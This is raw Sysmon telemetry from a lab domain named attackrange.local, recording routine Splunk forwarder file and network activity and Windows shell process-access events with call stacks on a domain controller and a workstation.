Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:54.140{466BC892-F2F6-60EB-F67C-00000000CF01}4136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:55.994{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=988D3A2A1AD919FD8E8690CEEB88D574,SHA256=BBC87586CEC04E91C3C33C80C63930000D6FB34D1F9FE3328A1E3271E407355B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806210Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:55.862{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B94496384448391F508E8AC3D9554357,SHA256=5434888DEFFC6E42042B20E264B48FCA7015930C934835712DF5CDAB67C5CBA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:55.679{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=5818DFC3E741738A4797EE89ADFAD3C5,SHA256=C1C0F897AE1D91C2DF2FC9343770B9115FB7B4FECFD21E70EFFB208A888EB973,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:55.156{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD34199EAF392EEF26A198838FBE6E7C,SHA256=B24A6418C8EBEFBF7975CCB5E8FC13E333C3B048C29BABF6817C69FB65F3C2F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806211Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:56.862{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A89C9A7C3FA82C293DBD2B21BB7D1EB,SHA256=462A333181DD393F60015773F072A41E5C93B01C37CE5B94C316B6E4E7066D8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:56.760{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806213Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:57.878{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9136C8ACA135A79E185A936D39BBAD0,SHA256=A72272A3A1D1864400A044CB9ADCDDC453351A9AF6434B0E5266BA97EB1983E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806212Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:55.386{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57164-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001046178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:48.765{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50918-false10.0.1.12-8000- 23542300x80000000000000001046177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:57.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D9BCB01C891F08FEC2918E0C0FB84B0,SHA256=A5AC309E3B9E127F4641D337356803AA5F819ECC1B6EB00C0AB5A31294E3F302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806214Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:58.894{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63589965E53EFCE17A61FA88150C8D55,SHA256=CC7C707506E8F33C0C68554BB372C7BB6E7E27469294BD5C2A0012EFA3A97415,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:50.296{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50919-false10.0.1.12-8089- 23542300x80000000000000001046180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:58.059{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf629e70.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:58.057{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1C326EFC62382E1B23315BCCCCD9FAF,SHA256=631E1760D1603CD914F06DAC179F52EBEB9EDF7186976C9A11CC0905F53BEAF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806215Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:59.894{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CF1B4FAFA893EB9A3AD9D030278838B,SHA256=E9694D26E0A4C26E45DDA50D89BE7FEF4EE84C462B590177BF7D4EFF11981572,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:59.091{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42B6486F0E3E5CFBCE9DACDF33ED65D7,SHA256=DC3DEB10E03AB27738D03891781A94FEC679244B108C901CE0C1C3F64F7A9BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806216Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:00.894{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CC42BFE9BF98CD9ED261F11B6F9BE8B,SHA256=690AD87AB2FD3546B4204B2CDBF5B7FDFFE5CB8798B115D8A2D28CA715EAC0AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.757{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001046259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.756{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001046258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.754{466BC892-32D3-60E8-770B-00000000CF01}63562944C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.754{466BC892-32D3-60E8-770B-00000000CF01}63562944C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.736{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DF0ED6F82C65D884D9E6A6B28B92EC0,SHA256=9936637E33257E7EC2AB88A8D68CE7CC5D234BB972B0DA99376C1CC1EB91C96A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.705{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.705{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.705{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.705{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=183C5FD9B02178EAD5DC51D2253F1096,SHA256=E34E5DFD79E69C2E21F1DC8A8ED978B27E69EE735C42C9EFAA35276B90BBBC67,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.689{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001046250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.689{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001046249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.689{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001046248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.689{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001046247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.674{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.674{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 